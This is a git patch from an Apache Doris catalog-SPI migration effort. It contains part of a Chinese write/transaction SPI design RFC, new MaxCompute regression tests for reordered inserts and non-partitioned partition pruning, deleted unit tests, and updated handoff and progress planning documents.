`Coordinator:2531/2536/2539` | 3 处 cast `updateXxxCommitData` | `transaction.addCommitData(TSerialize(present-field))`(B1)| +| `LoadProcessor:232-240` | 3 处 cast | 同上 | +| `FrontendServiceImpl:3697-3702` | `instanceof MCTransaction`+`allocateBlockIdRange` | `supportsWriteBlockAllocation()`+`allocateWriteBlockRange()`(C1)| +| `Transaction`(接口)| commit/rollback | +`addCommitData`/`supportsWriteBlockAllocation`/`allocateWriteBlockRange`/`getUpdateCnt`(default)| +| `MC/HMS/IcebergTransaction` | typed updates | override 新 default(过渡适配)| +| `PluginDrivenTransaction`(新)| — | wrap `ConnectorTransaction`,委派 | +| `PhysicalPlanTranslator` sink 分支 | 各 PhysicalXxxTableSink | `PluginDrivenTableSink` ← `ConnectorWritePlanProvider`(E)| +| `RewriteDataFileExecutor:61` | iceberg cast | **不动**(procedure,P6)| + +## 9. Edge cases +- **rollback/abort**:hive 清 staging + abort S3-MPU;mc abort/expire session;iceberg 丢弃未提交 manifest。经 `ConnectorTransaction.rollback()` + `abortInsert`。 +- **0 行 insert**:commit 空 fragments;连接器 finish 应幂等空提交。 +- **overwrite**(动/静态分区):经 `ConnectorWriteHandle.writeContext`(overwrite flag + static partition spec) 透传。 +- **partial failure**(部分 BE 成功):txn 整体 rollback(现语义不变)。 +- **getUpdateCnt 聚合**:连接器累加(mc 跨 block、hive 跨 partition、iceberg 跨 file)。 +- **txnId 生命周期**:`GlobalExternalTransactionInfoMgr` put/get/remove 不变;`PluginDrivenTransaction` 注册同路。 +- **B1 序列化失败**:fail-loud 抛(不静默丢 commit 数据)。 + +## 10. Open questions +1. **B1 shim 退休**:BE 加通用 `connector_commit_data` 字段后消除最后枚举——本 RFC 登记,不实现。 +2. **delete/merge handle 完备度**:本 RFC **定全 SPI 形状**(含 delete/merge),**实现**留 P6 iceberg;P4 mc/P7 hive 仅 insert。 +3. **commit 数据累积位置**:fe-core 累积传 finish vs 连接器内累积——倾向连接器内(少一次大集合传递),实现期定。 + +## 11. Risks / alternatives +- **B2/B3 否决**:B2 中立 envelope 丢富信息(iceberg delete-file/hive S3-MPU 难统一);B3 thrift 漏进 SPI。→ B1 最泛化、零 BE 改、保信息。 +- **C2/C3 否决**:C2 为 mc-only 需求过度泛化;C3 留 instanceof。→ C1 窄 seam。 +- **R-002(hive ACID compaction 一致性)**:本 RFC **不恶化**(不引入 ACID 写);登记,归 P7。 +- **R-003(iceberg procedures 抽象)**:defer E2/P6;本 RFC SPI **不预排除**(`getWritePlanProvider`/事务桥可复用)。 +- **R-001(image 兼容)**:写 SPI 不动持久化 logType/GSON(那是各连接器迁移期的 gate 工作)。 +- **大改面风险**:W-phase 解耦**不翻闸、不搬类、零行为变更**(3 impl 适配既有逻辑),风险可控;真正搬迁逐连接器(P4/P6/P7)分摊。 + +## 12. Ordered TODO(实现路线,待批准) + +> 本 RFC 是设计。批准后按下序落地。**W-phase = 本 scope=C 的共享产出**(解耦 + SPI 面,gate 不动);之后各连接器在其阶段做 adopter。 + +**W-phase(共享,本 RFC 直接后续;低风险、不翻闸、零行为变更)** +- [ ] W1 SPI 面:`ConnectorTransaction` 加 `addCommitData`/`supportsWriteBlockAllocation`/`allocateWriteBlockRange`/`getUpdateCnt`(default);`Connector.getWritePlanProvider` default null;`ConnectorWritePlanProvider`/`ConnectorWriteHandle`/`ConnectorSinkPlan` 新类(api/spi)。import-gate + checkstyle。 +- [ ] W2 fe-core `Transaction` 接口加同名 default;`MC/HMS/IcebergTransaction` override(TDeser→既有 typed update;mc override block 分配)。**golden 等价**:行为与现状逐位一致。 +- [ ] W3 解耦 `Coordinator`/`LoadProcessor`(→`addCommitData(TSerialize)`)+ `FrontendServiceImpl`(→`supportsWriteBlockAllocation`/`allocateWriteBlockRange`)。删除 6+1 处 cast/instanceof。 +- [ ] W4 `PluginDrivenTransaction`(fe-core)wrap `ConnectorTransaction`;`PluginDrivenTransactionManager` 产它。 +- [ ] W5 `PluginDrivenTableSink`(fe-core)+ `PhysicalPlanTranslator` 写 sink 收口(仿 scan,保留各 PhysicalXxxSink 作迁移期 fallback)。 +- [ ] W6 测试:`FakeConnector` 写默认行为;W2 适配的 golden 等价测(3 txn 的 addCommitData 反序列化 == 原 typed 路径);checkstyle 含 test 源。 +- [ ] W7 文档:本 RFC 决策入 `decisions-log`(D-021 scope=C + D-022 A/B1/C1/D/E);`01-spi-extensions-rfc.md` 加「E11 写/事务 SPI」节(脚注引 D-022,§5.2 纪律);PROGRESS/HANDOFF 同步。 + +**P4 maxcompute(首个 adopter,full 迁移 + 翻闸)**——本 RFC 批准 + W-phase 落地后启 +- [ ] 搬 `MCTransaction`/`MaxComputeMetadataOps`/MetaCache/SchemaCacheValue/ScanNode → `fe-connector-maxcompute`;impl `ConnectorWriteOps`(insert)+`ConnectorTransaction`(over `addCommitData`/`allocateWriteBlockRange`)+`ConnectorWritePlanProvider`(产 `TMaxComputeTableSink`)。 +- [ ] McStructureHelper 去重(删 fe-core 副本,DV/P1-T02)。 +- [ ] 翻闸 `SPI_READY_TYPES+="max_compute"`、删 `CatalogFactory` case、GSON 兼容、`getEngine` 分支(recon 已 pin,见 p4-maxcompute-migration-recon §5)。 +- [ ] 删 `datasource/maxcompute/`;清 ~36 反向引用(21 mechanical 折 SPI 分支,15 live 由本 SPI 接管)。 +- [ ] 连接器测试基线(仿 hudi 5 文件,JUnit5 手写替身)。 + +**P6 iceberg / P7 hive(后续 adopter)**:复用 W-phase SPI,各自 impl `ConnectorWriteOps`(iceberg +delete/merge)+`ConnectorWritePlanProvider`;iceberg procedures 经 E2 另议。 + +**完成判据**:W-phase 后 fe-core 通用写层零 `instanceof *Transaction`;3 现存写者经 SPI 多态、行为 golden 等价;BE 契约不变;P4 maxcompute 可独立翻闸;paimon 后续零-SPI 接入。 diff --git a/regression-test/data/external_table_p2/maxcompute/write/test_mc_write_insert.out b/regression-test/data/external_table_p2/maxcompute/write/test_mc_write_insert.out index 9c7a1a21807f4f..722306a54154b0 100644 --- a/regression-test/data/external_table_p2/maxcompute/write/test_mc_write_insert.out +++ b/regression-test/data/external_table_p2/maxcompute/write/test_mc_write_insert.out @@ -13,6 +13,11 @@ 1 test1 \N \N 2 test2 \N \N +-- !reordered_insert -- +7 alice 35 +9 bob 15 +11 carol 25 + -- !multi_batch -- 1 batch1 2 batch2 diff --git a/regression-test/suites/external_table_p2/maxcompute/test_max_compute_partition_prune.groovy b/regression-test/suites/external_table_p2/maxcompute/test_max_compute_partition_prune.groovy index e8cf906ff41e02..db07df02cc8ac2 100644 --- a/regression-test/suites/external_table_p2/maxcompute/test_max_compute_partition_prune.groovy +++ b/regression-test/suites/external_table_p2/maxcompute/test_max_compute_partition_prune.groovy @@ -63,9 +63,21 @@ INSERT INTO three_partition_tb PARTITION (part1='EU', part2=2025, part3='Q3') VA INSERT INTO three_partition_tb PARTITION (part1='AS', part2=2025, part3='Q1') VALUES (13, 'Nina'); INSERT INTO three_partition_tb PARTITION (part1='AS', part2=2025, part3='Q2') VALUES (14, 'Oscar'); INSERT INTO three_partition_tb PARTITION (part1='AS', part2=2025, part3='Q3') VALUES (15, 'Paul'); +-- FIX-NONPART-PRUNE-DATALOSS: a NON-partitioned table is required to guard the regression where a +-- filtered query over a non-partitioned MaxCompute table silently returned ZERO rows. +CREATE TABLE no_partition_tb ( + id INT, + name string +); +INSERT INTO no_partition_tb VALUES (1, 'Alice'); +INSERT INTO no_partition_tb VALUES (2, 'Bob'); +INSERT INTO no_partition_tb VALUES (3, 'Charlie'); +INSERT INTO no_partition_tb VALUES (4, 'David'); +INSERT INTO no_partition_tb VALUES (5, 'Eva'); select * from one_partition_tb; select * from two_partition_tb; select * from three_partition_tb; +select * from no_partition_tb; show partitions one_partition_tb; show partitions two_partition_tb; show partitions three_partition_tb; @@ -132,6 +144,8 @@ suite("test_max_compute_partition_prune", "p2,external") { explain { sql("${one_partition_1_1}") contains "partition=1/2" + // VPluginDrivenScanNode surfaces the backing connector/catalog type + contains "CONNECTOR: max_compute" } qt_one_partition_2_1 one_partition_2_1 @@ -288,6 +302,26 @@ suite("test_max_compute_partition_prune", "p2,external") { sql("${three_partition_11_0}") contains "partition=0/10" } + + // FIX-NONPART-PRUNE-DATALOSS truth-gate: a filtered query over a NON-partitioned + // table must return its matching rows, NOT zero. Before the fix + // (supportInternalPartitionPruned gated on partition columns) PruneFileScanPartition + // overwrote the selection with isPruned=true+empty for non-partitioned tables, so + // PluginDrivenScanNode short-circuited to no splits and these queries silently + // returned 0 rows. Asserted directly (no .out dependency) so the count is unambiguous. + def no_part_filtered = sql """SELECT id, name FROM no_partition_tb WHERE id = 5;""" + assertEquals(1, no_part_filtered.size(), + "non-partitioned MC table WHERE id=5 must return exactly its 1 matching row, " + + "not zero (FIX-NONPART-PRUNE-DATALOSS)") + assertEquals("5", no_part_filtered[0][0].toString()) + + def no_part_range = sql """SELECT id FROM no_partition_tb WHERE id >= 3 ORDER BY id;""" + assertEquals(3, no_part_range.size(), + "non-partitioned MC table WHERE id>=3 must return 3 rows (id 3,4,5), not zero") + + def no_part_all = sql """SELECT id FROM no_partition_tb ORDER BY id;""" + assertEquals(5, no_part_all.size(), + "non-partitioned MC table full scan must return all 5 rows") } } } diff --git a/regression-test/suites/external_table_p2/maxcompute/write/test_mc_write_insert.groovy b/regression-test/suites/external_table_p2/maxcompute/write/test_mc_write_insert.groovy index 4877f35e079c9f..686f7fec093cca 100644 --- a/regression-test/suites/external_table_p2/maxcompute/write/test_mc_write_insert.groovy +++ b/regression-test/suites/external_table_p2/maxcompute/write/test_mc_write_insert.groovy @@ -95,6 +95,24 @@ suite("test_mc_write_insert", "p2,external") { sql """INSERT INTO ${tb3} (id, name) VALUES (1, 'test1'), (2, 'test2')""" order_qt_partial_insert """ SELECT * FROM ${tb3} """ + // Test 3b: INSERT with a REORDERED explicit column list. MaxCompute's writer maps data + // positionally against the full table schema, so the bind layer must project the reordered + // user columns back to full-schema order (FIX-BIND-STATIC-PARTITION / P0-3). A cols-order + // projection would land values in the wrong columns (e.g. 'name' value into id). Both the + // VALUES and SELECT forms are exercised. + String tb3b = "reordered_insert_${uuid}" + sql """DROP TABLE IF EXISTS ${tb3b}""" + sql """ + CREATE TABLE ${tb3b} ( + id INT, + name STRING, + score INT + ) + """ + sql """INSERT INTO ${tb3b} (name, score, id) VALUES ('alice', 35, 7), ('bob', 15, 9)""" + sql """INSERT INTO ${tb3b} (score, id, name) SELECT 25, 11, 'carol'""" + qt_reordered_insert """ SELECT id, name, score FROM ${tb3b} ORDER BY id """ + // Test 4: INSERT multiple batches and verify accumulation String tb4 = "multi_batch_${uuid}" sql """DROP TABLE IF EXISTS ${tb4}""" From e9c5b3e70ceda2bef053fddd058aa6aea5706a29 Mon Sep 17 00:00:00 2001 From: morningman Date: Tue, 9 Jun 2026 17:49:22 +0800 Subject: [PATCH 007/128] update P5 handoff and fix compile issue --- .../maxcompute/MCTransactionTest.java | 54 ------- .../MaxComputeExternalCatalogTest.java | 146 ------------------ plan-doc/HANDOFF.md | 53 +++++++ plan-doc/PROGRESS.md | 36 +++-- 4 files changed, 75 insertions(+), 214 deletions(-) delete mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MCTransactionTest.java delete mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalogTest.java diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MCTransactionTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MCTransactionTest.java deleted file mode 100644 index e76f192a858917..00000000000000 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MCTransactionTest.java +++ /dev/null @@ -1,54 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.common.UserException; - -import org.junit.Assert; -import org.junit.Test; -import org.mockito.Mockito; - -import java.util.Optional; - -public class MCTransactionTest { - @Test - public void testBeginInsertRejectsOdpsExternalTable() { - assertBeginInsertRejectsUnsupportedOdpsTable("mc_external_table"); - } - - @Test - public void testBeginInsertRejectsOdpsLogicalView() { - assertBeginInsertRejectsUnsupportedOdpsTable("mc_logical_view"); - } - - private void assertBeginInsertRejectsUnsupportedOdpsTable(String tableName) { - MaxComputeExternalCatalog catalog = Mockito.mock(MaxComputeExternalCatalog.class); - MaxComputeExternalTable table = Mockito.mock(MaxComputeExternalTable.class); - Mockito.when(table.isUnsupportedOdpsTable()).thenReturn(true); - Mockito.when(table.getDbName()).thenReturn("default"); - Mockito.when(table.getName()).thenReturn(tableName); - - MCTransaction transaction = new MCTransaction(catalog); - - UserException exception = Assert.assertThrows(UserException.class, - () -> transaction.beginInsert(table, Optional.empty())); - Assert.assertTrue(exception.getMessage().contains( - "Writing MaxCompute external table or logical view is not supported: default." + tableName)); - Mockito.verify(catalog, Mockito.never()).getOdpsTableIdentifier(Mockito.anyString(), Mockito.anyString()); - } -} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalogTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalogTest.java deleted file mode 100644 index dfe22f136b5ca4..00000000000000 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalCatalogTest.java +++ /dev/null @@ -1,146 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.common.DdlException; -import org.apache.doris.common.maxcompute.MCProperties; -import org.apache.doris.datasource.ExternalCatalog; - -import org.junit.Assert; -import org.junit.Test; - -import java.util.HashMap; -import java.util.Map; - -public class MaxComputeExternalCatalogTest { - @Test - public void testSplitByteSizeErrorMessage() { - Map props = new HashMap<>(); - addRequiredProperties(props); - props.put(MCProperties.SPLIT_STRATEGY, MCProperties.SPLIT_BY_BYTE_SIZE_STRATEGY); - props.put(MCProperties.SPLIT_BYTE_SIZE, "1048576"); - - MaxComputeExternalCatalog catalog = new MaxComputeExternalCatalog(1L, "mc_catalog", null, props, ""); - - DdlException exception = Assert.assertThrows(DdlException.class, catalog::checkProperties); - Assert.assertTrue(exception.getMessage().contains( - MCProperties.SPLIT_BYTE_SIZE + " must be greater than or equal to 10485760")); - Assert.assertFalse(exception.getMessage().contains(MCProperties.SPLIT_ROW_COUNT)); - } - - @Test - public void testCheckWhenCreatingSkipsValidationByDefault() throws DdlException { - Map props = createRequiredProperties(true); - TestMaxComputeExternalCatalog catalog = new TestMaxComputeExternalCatalog(props); - - catalog.checkWhenCreating(); - - Assert.assertNull(catalog.checkedProjectName); - Assert.assertNull(catalog.checkedNamespaceSchemaProjectName); - } - - @Test - public void testCheckWhenCreatingValidatesProjectWhenValidationEnabled() throws DdlException { - Map props = createRequiredProperties(false); - props.put(ExternalCatalog.TEST_CONNECTION, "true"); - TestMaxComputeExternalCatalog catalog = new TestMaxComputeExternalCatalog(props); - - catalog.checkWhenCreating(); - - Assert.assertEquals("mc_project", catalog.checkedProjectName); - Assert.assertNull(catalog.checkedNamespaceSchemaProjectName); - } - - @Test - public void testCheckWhenCreatingValidatesSchemaWhenNamespaceSchemaEnabled() throws DdlException { - Map props = createRequiredProperties(true); - props.put(ExternalCatalog.TEST_CONNECTION, "true"); - TestMaxComputeExternalCatalog catalog = new TestMaxComputeExternalCatalog(props); - - catalog.checkWhenCreating(); - - Assert.assertNull(catalog.checkedProjectName); - Assert.assertEquals("mc_project", catalog.checkedNamespaceSchemaProjectName); - } - - @Test - public void testCheckWhenCreatingReportsInaccessibleProject() { - Map props = createRequiredProperties(false); - props.put(ExternalCatalog.TEST_CONNECTION, "true"); - TestMaxComputeExternalCatalog catalog = new TestMaxComputeExternalCatalog(props); - catalog.projectExists = false; - - DdlException exception = Assert.assertThrows(DdlException.class, catalog::checkWhenCreating); - - Assert.assertTrue(exception.getMessage().contains("Failed to validate MaxCompute project 'mc_project'")); - Assert.assertTrue(exception.getMessage().contains("does not exist or is not accessible")); - Assert.assertNull(catalog.checkedNamespaceSchemaProjectName); - } - - @Test - public void testCheckWhenCreatingReportsInaccessibleNamespaceSchema() { - Map props = createRequiredProperties(true); - props.put(ExternalCatalog.TEST_CONNECTION, "true"); - TestMaxComputeExternalCatalog catalog = new TestMaxComputeExternalCatalog(props); - catalog.threeTierModel = false; - - DdlException exception = Assert.assertThrows(DdlException.class, catalog::checkWhenCreating); - - Assert.assertTrue(exception.getMessage().contains("Failed to validate MaxCompute project 'mc_project'")); - Assert.assertTrue(exception.getMessage().contains("schema list is accessible")); - } - - private static Map createRequiredProperties(boolean enableNamespaceSchema) { - Map props = new HashMap<>(); - addRequiredProperties(props); - props.put(MCProperties.ENABLE_NAMESPACE_SCHEMA, Boolean.toString(enableNamespaceSchema)); - return props; - } - - private static void addRequiredProperties(Map props) { - props.put(MCProperties.PROJECT, "mc_project"); - props.put(MCProperties.ENDPOINT, "http://service.cn-beijing.maxcompute.aliyun-inc.com/api"); - props.put(MCProperties.ACCESS_KEY, "access_key"); - props.put(MCProperties.SECRET_KEY, "secret_key"); - } - - private static class TestMaxComputeExternalCatalog extends MaxComputeExternalCatalog { - private boolean projectExists = true; - private boolean threeTierModel = true; - private String checkedProjectName; - private String checkedNamespaceSchemaProjectName; - - private TestMaxComputeExternalCatalog(Map props) { - super(1L, "mc_catalog", null, props, ""); - } - - @Override - protected boolean maxComputeProjectExists(String projectName) { - checkedProjectName = projectName; - return projectExists; - } - - @Override - protected void validateMaxComputeNamespaceSchemaAccess(String projectName) { - checkedNamespaceSchemaProjectName = projectName; - if (!threeTierModel) { - throw new RuntimeException("schema list is not accessible"); - } - } - } -} diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 1bb74163a0d2c9..3b46b6cf5b1433 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,6 +5,57 @@ --- +# 🔥 第 19 次 handoff(2026-06-09,覆盖)— 🎉 P4 maxcompute 全部完成并合入;下一 session = P5 paimon 迁移 kickoff + +> **本 session**:用户确认「P4(maxcompute)已完成、HANDOFF 中所有 maxcompute TODO 已做完」,要求同步交接文档(PROGRESS + HANDOFF)并为下一 session 启动 **P5 paimon 迁移**做准备。**本 session 仅文档同步,0 产线代码。** + +## ✅ P4 完成核实(code-grounded,本 session 亲核) +- **翻闸已合入**:`max_compute` ∈ `CatalogFactory.SPI_READY_TYPES`(PR **#64253** "P4 maxcompute connector full adoption + live cutover (T01–T06)")。 +- **legacy 已删 + odps-free**:`fe-core/.../datasource/maxcompute/` 不存在;`grep com.aliyun.odps fe-core/src/main/java`=∅(PR **#64300** "remove legacy subsystem + make fe-core odps-free (T07–T09)",HEAD `e96037cf6aa`)。 +- **#64119 校验迁移已合入**:连接器含 `validateMaxComputeConnection`/`checkOperationSupported`;`git log -S validateMaxComputeConnection` 证其随 **#64300** squash 合入 —— 即上一次(第 18 次)handoff 的 10 文件工作已落地,无悬空。 +- **分支干净**:当前 `branch-catalog-spi`,HEAD=`e96037cf6aa`(#64300);`git status` 仅未跟踪 scratch(`.audit-scratch/`/`conf.cmy/`/`*.bak`/`.claude/scheduled_tasks.lock`)。 +- ⚠️ 仍有遗留 stash `stash@{0}`("WIP on branch-catalog-spi: ... #64253")—— 本 session 未动;如确认无用可由用户 `git stash drop stash@{0}`。 + +## ✅ 本 session 已完成(文档同步) +- **PROGRESS.md**:§header(P4 完成→P5 待启动 + 进度统一 ~32%);§一(P4 100%✅ / P5 标「下一阶段」);§二看板(maxcompute 100%);§三(P4 收尾为「已合入 #64253+#64300」+ **新增 P5 kickoff 块**:范围/风险/材料);§四(加 2026-06-09 P4 完成里程碑);§六(决策计数 25→**36**、偏差 12→**22** 纠正,此前严重 stale);§七(session 状态)。 +- **HANDOFF.md**:本第 19 次 + 折叠第 18 次(标注「已随 #64300 合入」)。 + +## 🎯 下一 session = P5 paimon 迁移 kickoff(用户定) +> **策略 = full adopter + 翻闸**(复用 P4 样板,非 P3 hybrid)。P4 已交付可复用的**写/事务 SPI**(`ConnectorTransaction`/`ConnectorWritePlanProvider`/`PluginDrivenTransaction`/`PluginDrivenInsertExecutor`)+ full-adopter + cutover 流程范本。 + +**kickoff 步骤**(沿用 P2/P3/P4:recon → 设计 → 用户签字 → 分批实现): +1. **code-grounded recon**(多 Agent + 亲核,Rule 8)—— 产 `research/p5-paimon-migration-recon.md`: + - 连接器模块 `fe-connector-paimon/` 现状(10 文件:scan/predicate/handle 完整;`ConnectorMetadata` 部分实现;catalog flavor / MVCC / vended / sys-tables 缺)。 + - fe-core footprint:`datasource/paimon/`(22 顶层 + source/5 + profile/2);**反向 instanceof 10 处**(`PhysicalPlanTranslator` 的 `PAIMON_EXTERNAL_TABLE` 分支等)。 + - **6 个 catalog flavor**(HMS/DLF/REST/File/Base/Factory)—— 连接器内工厂重组 `PaimonConnectorProvider.create()` 按 properties 实例化 paimon `Catalog`。 + - **复用面**:P0 已建 `ConnectorMvccSnapshot`(E5) / vended-creds(E6) / sys-tables(E7) SPI —— **paimon 是首个真正消费 E5/E6/E7 的 adopter**(MC 未用,无先例,须重点核)。BE 经 JNI 调 paimon-reader,序列化 `Table` 经 `ConnectorScanPlanProvider.getSerializedTable` 已支持。 + - **P1-T02 推迟项**:fe-core 重复 `PaimonPredicateConverter`(**仍在** `datasource/paimon/source/PaimonPredicateConverter.java:43`,连接器侧另有一份)—— P5 删 fe-core 版。 +2. **写设计 + 批次计划** `tasks/P5-paimon-migration.md`(连接器档约定「P5 待启动时建」)。 +3. **用户签字** → 分批落地、独立 commit、每批守门。 + +**已知特殊性 / 风险**(master §3.6 line 218 + 连接器档 + risks): +- **R-004**(classloader 隔离打破 SDK 单例,**paimon 明列**)+ **R-007**(FE/BE 共享 jar 冲突)+ **R-012**(snapshotId 类型)—— P5/P6 触发窗口,recon 须评估(auto-memory [[catalog-spi-be-java-ext-shared-classpath]] 有共享类路径模型)。 +- **关联决策**:D-005(HMS flavor 走 `tableFormatType`,P3-T08 已细化 per-table `getScanPlanProvider`)、D-006(cache 放连接器内)。 +- paimon-HMS-flavor 复用 `fe-connector-hms`(P3 已建、稳定)。 + +**起点材料**:[paimon 连接器档](./connectors/paimon.md)、master plan [§3.6](./00-connector-migration-master-plan.md)、[P4 task 档](./tasks/P4-maxcompute-migration.md)(full-adopter 样板)、写 SPI RFC `tasks/designs/connector-write-spi-rfc.md`、[AGENT-PLAYBOOK](./AGENT-PLAYBOOK.md)。 + +## ⚙️ 操作须知(复用) +- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl : -am` + `-Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`(须 -am 连带 rebuild)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 +- 连接器**禁 import fe-core**(import-gate `bash tools/check-connector-imports.sh`)—— 需 fe Config/session 值经 session-property 透传([[catalog-spi-connector-session-tz-gotcha]])。 +- 连接器测试模块**无 mockito**(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]])。 +- 分支 `branch-catalog-spi`(HEAD #64300);P5 建议 off 最新 upstream 起新分支。未跟踪 scratch 勿提交。 + +## 🧠 给下一个 agent 的 meta +- **P4 是 full-adopter + cutover 的完整样板** —— P5 复用其写 SPI + 流程;但 paimon 多了 **6 catalog flavor 工厂** + **首次真正用 E5/E6/E7(MVCC/vended/sys-tables)**,recon 须重点核这两块(MC 无先例)。 +- **live e2e 仍是翻闸真正完成门**(CI 跳)—— P5 翻闸前同样需用户真实 paimon 环境验证。 +- **翻闸时 GSON 三注册须 atomic 齐迁**(catalog+db+table,[[catalog-spi-gson-migrate-all-three]],漏 db 致 ClassCastException);**每个 full-adopter 都要补 FE 分发缺口**(DROP TABLE / CREATE·DROP DB / SHOW PARTITIONS / partitions TVF,[[catalog-spi-cutover-fe-dispatch-gap]])。 +- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);测基建无 fe-core/无 mockito([[catalog-spi-fe-core-test-infra]]);clean-room 对抗复审偏好([[clean-room-adversarial-review-pref]]);构建坑([[doris-build-verify-gotchas]])。 + +--- + +
📅 历史:第 18 次 handoff(2026-06-09)— PR #64119 MaxCompute 校验迁移 SPI DONE(10 文件已随 #64300 合入) + # 🔥 第 18 次 handoff(2026-06-09,覆盖)— PR #64119(MaxCompute test_connection 校验 + 外表/视图 read·write 拒绝)迁移 SPI DONE,连接器 UT 全绿 > **本 session**:用户要求把 upstream PR apache/doris#64119(`[fix](fe) Improve MaxCompute catalog validation`,11 文件/+422)的功能完整迁移到 SPI 框架,并跑通其 3 个单元测试。PR 改的 fe-core 类(`MaxComputeExternalCatalog`/`MaxComputeExternalTable`/`MCTransaction`/`MaxComputeScanNode`)在本 fork 已于 P4 删除→连接器化,故为真迁移。**用户定夺**:① 范围 = surgical(补 A + 加 C,B/D 已在不动);② 测试 = fold 进现有连接器测试文件。 @@ -38,6 +89,8 @@ - maven 绝对 `-f .../fe/pom.xml -pl :fe-connector-maxcompute -am test [-Dtest=X] -Dmaven.build.cache.enabled=false`;**必带 -am**;读真实 `Tests run:`/`BUILD`,勿信后台 echo exit。 - 分支 `catalog-spi-06`。未跟踪 `.audit-scratch/`(本 session 测试 log)/`conf.cmy/`/`*.bak`/`scheduled_tasks.lock`(勿提交)。 +
+ ---
📅 历史:第 17 次 handoff(2026-06-09)— 老 MaxCompute 代码移除 DONE(3 commit,全门绿) diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index 203565b1a13265..a5acbbd78ddc16 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-06-09** | 当前阶段:**P4 maxcompute·scope=C(翻闸完成)**——写/事务 SPI RFC 已批准;**W-phase(W1–W7)全部落地** ✅;**P4 adopter 设计已批准**([D-023],5 批/11 task);**Batch A+B 全完成**(T01–T04,gate 关 dormant);**Batch C 翻闸完成**(T05 image-compat + T06a 写接线/UT + **T06b flip ✅** `CatalogFactory.SPI_READY_TYPES += "max_compute"`,gate 全绿 [D-027]);**Batch D 删除完成 ✅**(2026-06-09,分支 `catalog-spi-06` off upstream `9ed49571b20`/#64253:删 20 fe-core 文件 + 21 反向引用清理 + MCUtils 下沉 be-java-ext,fe-core 依赖树**彻底无 odps**;`7a4db351100`+`409300a75b8`,test-compile/checkstyle 0/import-gate/grep-empty/dependency:tree 全绿——设计 [Batch D 移除](./tasks/designs/P4-batchD-maxcompute-removal-design.md))。P3 hybrid 已 **#64143 合入** `branch-catalog-spi`(`5c240dc7a34`)| 项目总进度:**38%** +> 最后更新:**2026-06-09** | 当前阶段:**P4 maxcompute 完成 ✅(已合入),P5 paimon 待启动(下一 session)**——P4 full-adopter 迁移 + live 翻闸 + legacy 删除全部完成并合入 `branch-catalog-spi`:**#64253**(T01–T06 连接器全适配 + `CatalogFactory.SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,fe-core 依赖树**彻底无 odps**,HEAD `e96037cf6aa`);upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI 并随 #64300 合入。前序 P0/P1/P2(#63582/#63641/#64096)+ P3 hybrid(#64143)均已合入。**下一阶段 = P5 paimon 迁移**(复用 P4 full-adopter 写 SPI 样板;kickoff = recon + 设计)。| 项目总进度:**~32%**(按 §一 进度条加权:P0+P1+P2+P4 满 + P3 hybrid 45%,约 7.9/25 周) > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -13,13 +13,13 @@ | **P1** | scan-node 收口 + 重复清理 | 1 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR [#63641](https://github.com/apache/doris/pull/63641) squash-merged `778c5dd610f`;T1 推迟 P8;T2 推迟 P4/P5)| [tasks/P1](./tasks/P1-scan-node-cleanup.md) | | **P2** | trino-connector 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 已合入 `branch-catalog-spi`(#64096,squash `0793f032662`;T12 回归推迟 DV-003)| [tasks/P2](./tasks/P2-trino-connector-migration.md) | | P3 | hudi 迁移 | 2 周 | ▰▰▰▰▰▱▱▱▱▱ 45% | ✅ hybrid(D-019)批 